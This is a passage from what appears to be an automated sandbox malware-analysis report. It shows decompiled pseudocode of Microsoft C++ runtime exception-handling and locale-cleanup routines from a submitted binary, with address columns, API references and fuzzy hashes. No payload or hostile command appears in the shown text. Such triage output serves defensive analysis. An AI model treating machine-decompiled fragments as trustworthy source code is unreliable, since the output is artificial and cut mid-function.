												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E009F992B(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E009FB9D8(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E009FA3DE(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E009FB6DC(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E009FC467(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E009FB6DC(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E009FB6DC(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E009FB6DC(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E009FB6DC(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E009FC467(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E00A034C7(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E009FC0FB( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0xa45750) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E009FA3DE(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E009FC0E3( &_v64);
											E009F98BF( &_v64, 0xa212bc);
											L63:
											 *(E009FB6DC(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E009FB6DC(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E009F9B1E(_t279, _t319, _t274);
											E009FC367(_a8, _a16, _t305);
											_t235 = E009FC524(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E009FC2DE(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                                                                                                                                                                          0x009fba58
                                                                                                                                                                          0x009fba5f
                                                                                                                                                                          0x009fba61
                                                                                                                                                                          0x009fba6a
                                                                                                                                                                          0x009fba70
                                                                                                                                                                          0x009fba78
                                                                                                                                                                          0x009fba7a
                                                                                                                                                                          0x009fba7d
                                                                                                                                                                          0x009fba83
                                                                                                                                                                          0x009fbdfc
                                                                                                                                                                          0x009fbdfc
                                                                                                                                                                          0x009fbe01
                                                                                                                                                                          0x009fbe03
                                                                                                                                                                          0x009fbe05
                                                                                                                                                                          0x009fbe08
                                                                                                                                                                          0x009fbe09
                                                                                                                                                                          0x009fbe0c
                                                                                                                                                                          0x009fbe12
                                                                                                                                                                          0x009fbf31
                                                                                                                                                                          0x009fbe18
                                                                                                                                                                          0x009fbe1a
                                                                                                                                                                          0x009fbe21
                                                                                                                                                                          0x009fbe24
                                                                                                                                                                          0x009fbe27
                                                                                                                                                                          0x009fbe2d
                                                                                                                                                                          0x009fbe2f
                                                                                                                                                                          0x009fbe34
                                                                                                                                                                          0x009fbe37
                                                                                                                                                                          0x009fbe39
                                                                                                                                                                          0x009fbe3f
                                                                                                                                                                          0x009fbe41
                                                                                                                                                                          0x009fbe47
                                                                                                                                                                          0x009fbe5c
                                                                                                                                                                          0x009fbe61
                                                                                                                                                                          0x009fbe64
                                                                                                                                                                          0x009fbe66
                                                                                                                                                                          0x009fbf2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf2e
                                                                                                                                                                          0x009fbe66
                                                                                                                                                                          0x009fbe47
                                                                                                                                                                          0x009fbe3f
                                                                                                                                                                          0x009fbe37
                                                                                                                                                                          0x009fbe6c
                                                                                                                                                                          0x009fbe6f
                                                                                                                                                                          0x009fbe72
                                                                                                                                                                          0x009fbe75
                                                                                                                                                                          0x009fbe78
                                                                                                                                                                          0x009fbe7e
                                                                                                                                                                          0x009fbe90
                                                                                                                                                                          0x009fbe95
                                                                                                                                                                          0x009fbe98
                                                                                                                                                                          0x009fbe9b
                                                                                                                                                                          0x009fbe9e
                                                                                                                                                                          0x009fbea1
                                                                                                                                                                          0x009fbea4
                                                                                                                                                                          0x009fbea7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbead
                                                                                                                                                                          0x009fbead
                                                                                                                                                                          0x009fbeb0
                                                                                                                                                                          0x009fbeb3
                                                                                                                                                                          0x009fbec2
                                                                                                                                                                          0x009fbec3
                                                                                                                                                                          0x009fbec3
                                                                                                                                                                          0x009fbec5
                                                                                                                                                                          0x009fbec8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbeca
                                                                                                                                                                          0x009fbecd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbedb
                                                                                                                                                                          0x009fbedd
                                                                                                                                                                          0x009fbee0
                                                                                                                                                                          0x009fbee2
                                                                                                                                                                          0x009fbeea
                                                                                                                                                                          0x009fbeea
                                                                                                                                                                          0x009fbeed
                                                                                                                                                                          0x009fbeef
                                                                                                                                                                          0x009fbef1
                                                                                                                                                                          0x009fbf0d
                                                                                                                                                                          0x009fbf12
                                                                                                                                                                          0x009fbf15
                                                                                                                                                                          0x009fbf15
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbeed
                                                                                                                                                                          0x009fbee4
                                                                                                                                                                          0x009fbee8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf18
                                                                                                                                                                          0x009fbf1b
                                                                                                                                                                          0x009fbf1c
                                                                                                                                                                          0x009fbf1f
                                                                                                                                                                          0x009fbf22
                                                                                                                                                                          0x009fbf25
                                                                                                                                                                          0x009fbf28
                                                                                                                                                                          0x009fbf28
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbeb3
                                                                                                                                                                          0x009fbf32
                                                                                                                                                                          0x009fbf37
                                                                                                                                                                          0x009fbf38
                                                                                                                                                                          0x009fbf3b
                                                                                                                                                                          0x009fbf3e
                                                                                                                                                                          0x009fbf3f
                                                                                                                                                                          0x009fbf40
                                                                                                                                                                          0x009fbf41
                                                                                                                                                                          0x009fbf44
                                                                                                                                                                          0x009fbf46
                                                                                                                                                                          0x009fbfbe
                                                                                                                                                                          0x009fbfc0
                                                                                                                                                                          0x009fbfc0
                                                                                                                                                                          0x009fbf48
                                                                                                                                                                          0x009fbf48
                                                                                                                                                                          0x009fbf4b
                                                                                                                                                                          0x009fbf4e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf50
                                                                                                                                                                          0x009fbf50
                                                                                                                                                                          0x009fbf53
                                                                                                                                                                          0x009fbf56
                                                                                                                                                                          0x009fbf5d
                                                                                                                                                                          0x009fbf5d
                                                                                                                                                                          0x009fbf60
                                                                                                                                                                          0x009fbf62
                                                                                                                                                                          0x009fbf64
                                                                                                                                                                          0x009fbf96
                                                                                                                                                                          0x009fbf96
                                                                                                                                                                          0x009fbf99
                                                                                                                                                                          0x009fbfa0
                                                                                                                                                                          0x009fbfa0
                                                                                                                                                                          0x009fbfa3
                                                                                                                                                                          0x009fbfa6
                                                                                                                                                                          0x009fbfad
                                                                                                                                                                          0x009fbfad
                                                                                                                                                                          0x009fbfb0
                                                                                                                                                                          0x009fbfb7
                                                                                                                                                                          0x009fbfb9
                                                                                                                                                                          0x009fbfb9
                                                                                                                                                                          0x009fbfb2
                                                                                                                                                                          0x009fbfb2
                                                                                                                                                                          0x009fbfb5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbfb5
                                                                                                                                                                          0x009fbfa8
                                                                                                                                                                          0x009fbfa8
                                                                                                                                                                          0x009fbfab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbfab
                                                                                                                                                                          0x009fbf9b
                                                                                                                                                                          0x009fbf9b
                                                                                                                                                                          0x009fbf9e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf9e
                                                                                                                                                                          0x009fbfba
                                                                                                                                                                          0x009fbf66
                                                                                                                                                                          0x009fbf66
                                                                                                                                                                          0x009fbf66
                                                                                                                                                                          0x009fbf69
                                                                                                                                                                          0x009fbf69
                                                                                                                                                                          0x009fbf6b
                                                                                                                                                                          0x009fbf6d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf6f
                                                                                                                                                                          0x009fbf71
                                                                                                                                                                          0x009fbf85
                                                                                                                                                                          0x009fbf85
                                                                                                                                                                          0x009fbf73
                                                                                                                                                                          0x009fbf73
                                                                                                                                                                          0x009fbf76
                                                                                                                                                                          0x009fbf79
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf7b
                                                                                                                                                                          0x009fbf7b
                                                                                                                                                                          0x009fbf7e
                                                                                                                                                                          0x009fbf81
                                                                                                                                                                          0x009fbf83
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf83
                                                                                                                                                                          0x009fbf79
                                                                                                                                                                          0x009fbf8e
                                                                                                                                                                          0x009fbf8e
                                                                                                                                                                          0x009fbf90
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf92
                                                                                                                                                                          0x009fbf92
                                                                                                                                                                          0x009fbf92
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf90
                                                                                                                                                                          0x009fbf89
                                                                                                                                                                          0x009fbf8b
                                                                                                                                                                          0x009fbf8b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf8b
                                                                                                                                                                          0x009fbf58
                                                                                                                                                                          0x009fbf58
                                                                                                                                                                          0x009fbf5b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf5b
                                                                                                                                                                          0x009fbf56
                                                                                                                                                                          0x009fbf4e
                                                                                                                                                                          0x009fbfc1
                                                                                                                                                                          0x009fbfc5
                                                                                                                                                                          0x009fbfc5
                                                                                                                                                                          0x009fba92
                                                                                                                                                                          0x009fba92
                                                                                                                                                                          0x009fba9b
                                                                                                                                                                          0x009fbb98
                                                                                                                                                                          0x009fbb98
                                                                                                                                                                          0x009fbb9b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbaca
                                                                                                                                                                          0x009fbaca
                                                                                                                                                                          0x009fbacf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbad5
                                                                                                                                                                          0x009fbad5
                                                                                                                                                                          0x009fbadd
                                                                                                                                                                          0x009fbd96
                                                                                                                                                                          0x009fbd9a
                                                                                                                                                                          0x009fbae3
                                                                                                                                                                          0x009fbae8
                                                                                                                                                                          0x009fbaeb
                                                                                                                                                                          0x009fbaf0
                                                                                                                                                                          0x009fbaf7
                                                                                                                                                                          0x009fbafc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb34
                                                                                                                                                                          0x009fbb3c
                                                                                                                                                                          0x009fbba0
                                                                                                                                                                          0x009fbba0
                                                                                                                                                                          0x009fbba3
                                                                                                                                                                          0x009fbba6
                                                                                                                                                                          0x009fbba8
                                                                                                                                                                          0x009fbbab
                                                                                                                                                                          0x009fbbae
                                                                                                                                                                          0x009fbbb4
                                                                                                                                                                          0x009fbd65
                                                                                                                                                                          0x009fbd65
                                                                                                                                                                          0x009fbd68
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd6a
                                                                                                                                                                          0x009fbd6a
                                                                                                                                                                          0x009fbd6d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd73
                                                                                                                                                                          0x009fbd73
                                                                                                                                                                          0x009fbd76
                                                                                                                                                                          0x009fbd79
                                                                                                                                                                          0x009fbd7a
                                                                                                                                                                          0x009fbd7b
                                                                                                                                                                          0x009fbd7e
                                                                                                                                                                          0x009fbd7f
                                                                                                                                                                          0x009fbd82
                                                                                                                                                                          0x009fbd83
                                                                                                                                                                          0x009fbd88
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd88
                                                                                                                                                                          0x009fbd6d
                                                                                                                                                                          0x009fbbba
                                                                                                                                                                          0x009fbbba
                                                                                                                                                                          0x009fbbbe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbbc4
                                                                                                                                                                          0x009fbbc4
                                                                                                                                                                          0x009fbbcb
                                                                                                                                                                          0x009fbbe3
                                                                                                                                                                          0x009fbbe3
                                                                                                                                                                          0x009fbbe6
                                                                                                                                                                          0x009fbbe9
                                                                                                                                                                          0x009fbbef
                                                                                                                                                                          0x009fbbff
                                                                                                                                                                          0x009fbc04
                                                                                                                                                                          0x009fbc07
                                                                                                                                                                          0x009fbc0a
                                                                                                                                                                          0x009fbc0d
                                                                                                                                                                          0x009fbc10
                                                                                                                                                                          0x009fbc13
                                                                                                                                                                          0x009fbc16
                                                                                                                                                                          0x009fbc1c
                                                                                                                                                                          0x009fbc1c
                                                                                                                                                                          0x009fbc1f
                                                                                                                                                                          0x009fbc22
                                                                                                                                                                          0x009fbc31
                                                                                                                                                                          0x009fbc32
                                                                                                                                                                          0x009fbc32
                                                                                                                                                                          0x009fbc34
                                                                                                                                                                          0x009fbc37
                                                                                                                                                                          0x009fbc3d
                                                                                                                                                                          0x009fbc40
                                                                                                                                                                          0x009fbc46
                                                                                                                                                                          0x009fbc48
                                                                                                                                                                          0x009fbc4b
                                                                                                                                                                          0x009fbc4e
                                                                                                                                                                          0x009fbc57
                                                                                                                                                                          0x009fbc5a
                                                                                                                                                                          0x009fbc5c
                                                                                                                                                                          0x009fbc5c
                                                                                                                                                                          0x009fbc5f
                                                                                                                                                                          0x009fbc62
                                                                                                                                                                          0x009fbc65
                                                                                                                                                                          0x009fbc68
                                                                                                                                                                          0x009fbc6b
                                                                                                                                                                          0x009fbc70
                                                                                                                                                                          0x009fbc71
                                                                                                                                                                          0x009fbc72
                                                                                                                                                                          0x009fbc73
                                                                                                                                                                          0x009fbc74
                                                                                                                                                                          0x009fbc77
                                                                                                                                                                          0x009fbc79
                                                                                                                                                                          0x009fbc7b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbc7d
                                                                                                                                                                          0x009fbc7d
                                                                                                                                                                          0x009fbc7d
                                                                                                                                                                          0x009fbc80
                                                                                                                                                                          0x009fbc83
                                                                                                                                                                          0x009fbc85
                                                                                                                                                                          0x009fbc86
                                                                                                                                                                          0x009fbc8b
                                                                                                                                                                          0x009fbc8e
                                                                                                                                                                          0x009fbc90
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbc92
                                                                                                                                                                          0x009fbc93
                                                                                                                                                                          0x009fbc96
                                                                                                                                                                          0x009fbc98
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbc9a
                                                                                                                                                                          0x009fbc9a
                                                                                                                                                                          0x009fbc9d
                                                                                                                                                                          0x009fbca0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbca0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbc98
                                                                                                                                                                          0x009fbcb4
                                                                                                                                                                          0x009fbcba
                                                                                                                                                                          0x009fbcd7
                                                                                                                                                                          0x009fbcdc
                                                                                                                                                                          0x009fbcdc
                                                                                                                                                                          0x009fbcdf
                                                                                                                                                                          0x009fbcdf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbca3
                                                                                                                                                                          0x009fbca3
                                                                                                                                                                          0x009fbca4
                                                                                                                                                                          0x009fbca7
                                                                                                                                                                          0x009fbcaa
                                                                                                                                                                          0x009fbcad
                                                                                                                                                                          0x009fbcad
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbcb2
                                                                                                                                                                          0x009fbc4e
                                                                                                                                                                          0x009fbc40
                                                                                                                                                                          0x009fbce2
                                                                                                                                                                          0x009fbce5
                                                                                                                                                                          0x009fbce6
                                                                                                                                                                          0x009fbce9
                                                                                                                                                                          0x009fbcec
                                                                                                                                                                          0x009fbcef
                                                                                                                                                                          0x009fbcf2
                                                                                                                                                                          0x009fbcf2
                                                                                                                                                                          0x009fbcfb
                                                                                                                                                                          0x009fbcfe
                                                                                                                                                                          0x009fbcfe
                                                                                                                                                                          0x009fbc16
                                                                                                                                                                          0x009fbd01
                                                                                                                                                                          0x009fbd05
                                                                                                                                                                          0x009fbd07
                                                                                                                                                                          0x009fbd0a
                                                                                                                                                                          0x009fbd10
                                                                                                                                                                          0x009fbd10
                                                                                                                                                                          0x009fbd18
                                                                                                                                                                          0x009fbd1d
                                                                                                                                                                          0x009fbd8b
                                                                                                                                                                          0x009fbd8b
                                                                                                                                                                          0x009fbd90
                                                                                                                                                                          0x009fbd94
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd1f
                                                                                                                                                                          0x009fbd1f
                                                                                                                                                                          0x009fbd23
                                                                                                                                                                          0x009fbd35
                                                                                                                                                                          0x009fbd38
                                                                                                                                                                          0x009fbd3b
                                                                                                                                                                          0x009fbd3d
                                                                                                                                                                          0x009fbd54
                                                                                                                                                                          0x009fbd58
                                                                                                                                                                          0x009fbd5e
                                                                                                                                                                          0x009fbd5f
                                                                                                                                                                          0x009fbd61
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd63
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd63
                                                                                                                                                                          0x009fbd3f
                                                                                                                                                                          0x009fbd44
                                                                                                                                                                          0x009fbd47
                                                                                                                                                                          0x009fbd4c
                                                                                                                                                                          0x009fbd4f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd4f
                                                                                                                                                                          0x009fbd25
                                                                                                                                                                          0x009fbd28
                                                                                                                                                                          0x009fbd2b
                                                                                                                                                                          0x009fbd2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd2f
                                                                                                                                                                          0x009fbd2f
                                                                                                                                                                          0x009fbd33
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbd33
                                                                                                                                                                          0x009fbd2d
                                                                                                                                                                          0x009fbd23
                                                                                                                                                                          0x009fbbcd
                                                                                                                                                                          0x009fbbcd
                                                                                                                                                                          0x009fbbd4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbbd6
                                                                                                                                                                          0x009fbbd6
                                                                                                                                                                          0x009fbbdd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbbdd
                                                                                                                                                                          0x009fbbd4
                                                                                                                                                                          0x009fbbcb
                                                                                                                                                                          0x009fbbbe
                                                                                                                                                                          0x009fbb3e
                                                                                                                                                                          0x009fbb46
                                                                                                                                                                          0x009fbb49
                                                                                                                                                                          0x009fbb4e
                                                                                                                                                                          0x009fbb52
                                                                                                                                                                          0x009fbb55
                                                                                                                                                                          0x009fbb5b
                                                                                                                                                                          0x009fbb5e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb60
                                                                                                                                                                          0x009fbb60
                                                                                                                                                                          0x009fbb63
                                                                                                                                                                          0x009fbb65
                                                                                                                                                                          0x009fbd9b
                                                                                                                                                                          0x009fbd9b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb6b
                                                                                                                                                                          0x009fbb73
                                                                                                                                                                          0x009fbb7e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb87
                                                                                                                                                                          0x009fbb8a
                                                                                                                                                                          0x009fbb8b
                                                                                                                                                                          0x009fbb8e
                                                                                                                                                                          0x009fbb90
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb96
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb96
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbb90
                                                                                                                                                                          0x009fbb6b
                                                                                                                                                                          0x009fbda0
                                                                                                                                                                          0x009fbda0
                                                                                                                                                                          0x009fbda2
                                                                                                                                                                          0x009fbda3
                                                                                                                                                                          0x009fbdaa
                                                                                                                                                                          0x009fbdad
                                                                                                                                                                          0x009fbdbb
                                                                                                                                                                          0x009fbdc0
                                                                                                                                                                          0x009fbdc5
                                                                                                                                                                          0x009fbdc8
                                                                                                                                                                          0x009fbdcd
                                                                                                                                                                          0x009fbdd0
                                                                                                                                                                          0x009fbdd3
                                                                                                                                                                          0x009fbdd5
                                                                                                                                                                          0x009fbdd7
                                                                                                                                                                          0x009fbdd7
                                                                                                                                                                          0x009fbddc
                                                                                                                                                                          0x009fbde8
                                                                                                                                                                          0x009fbdee
                                                                                                                                                                          0x009fbdf3
                                                                                                                                                                          0x009fbdf6
                                                                                                                                                                          0x009fbdf7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbdf7
                                                                                                                                                                          0x009fbb5e
                                                                                                                                                                          0x009fbb3c
                                                                                                                                                                          0x009fbafc
                                                                                                                                                                          0x009fbadd
                                                                                                                                                                          0x009fbacf
                                                                                                                                                                          0x009fba9b

                                                                                                                                                                          APIs
                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 009FBB55
                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 009FBB77
                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 009FBC86
                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 009FBD58
                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 009FBDDC
                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 009FBDF7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 2123188842-393685449
                                                                                                                                                                          • Opcode ID: b1d1309a821ca8cb48e8a4ae4be088263e82fd40b96e95197da5cf75cc079d36
                                                                                                                                                                          • Instruction ID: 0cc349302ed02ea2ee139b46a9372f917fc2cf8468956825aa3b7e4a8c9a6574
                                                                                                                                                                          • Opcode Fuzzy Hash: b1d1309a821ca8cb48e8a4ae4be088263e82fd40b96e95197da5cf75cc079d36
                                                                                                                                                                          • Instruction Fuzzy Hash: C1B169B180020DEFCF15DFA4D881ABEBBB9BF48310B14405AEA156B256D731DA51CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A040B8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E00A040B8(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0xa17bc0;
				if(_t68 != 0xa17bc0) {
					E00A0447F(_t68);
					_t36 = _a4;
				}
				E00A0447F( *((intOrPtr*)(_t36 + 0x3c)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x30)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x34)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x38)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x28)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x2c)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x40)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x44)));
				E00A0447F( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
